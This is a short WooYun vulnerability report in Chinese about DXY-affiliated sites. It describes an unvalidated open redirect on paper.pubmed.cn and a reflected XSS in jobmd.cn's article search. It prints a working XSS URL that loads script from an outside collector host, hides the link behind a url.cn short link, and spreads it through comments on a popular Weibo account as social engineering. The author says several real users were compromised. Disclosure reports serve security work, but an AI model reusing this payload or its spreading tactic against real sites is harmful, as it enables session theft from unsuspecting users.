WooYun.org

http://paper.pubmed.cn/do.php?ac=login&rfu=http://paper.pubmed.cn/ rfu对地址未验证
http://paper.pubmed.cn/do.php?ac=login&rfu=(可构造任意链接进行跳转)
主要还是说说xss吧，没说明，一个礼包- -剑心还是不给过。这次我还是和上次一样。来一个利用吧。
我选中了http://www.jobmd.cn/article站点的搜索处的XSS进行测试。
之前提交过，但是没过程未过，这次我想了下，本想选择在论坛处通过发帖的形式传播一下。但是新注册，不能通过邀请，但是又不想手机注册，那怎么办呢？
我忽然想到了一个好的idea，就是通过@fenng的微博作为一个跳板（大辉哥微博是很多人看的哟，因此这里头肯定会有人是登录了丁香园帐号的。）
构造好代码：http://www.jobmd.cn/article/search.htm?keywords=%3C%2Ftitle%3E%3Cscript+src%3D%22http%3A%2F%2Fxss.ezsec.org%2F%3Fu%3Df71717%22+%3E%3C%2Fscript%3E&category=-1&action=Search&action_search=
这个时候还是太长了，我们通过url.cn转下，让他变得更加简洁：
http://url.cn/E273r7
然后通过小微博号发布到fenng的微博评论上。（带一点儿社工的性质）

没有多久，就有几个用户中招了。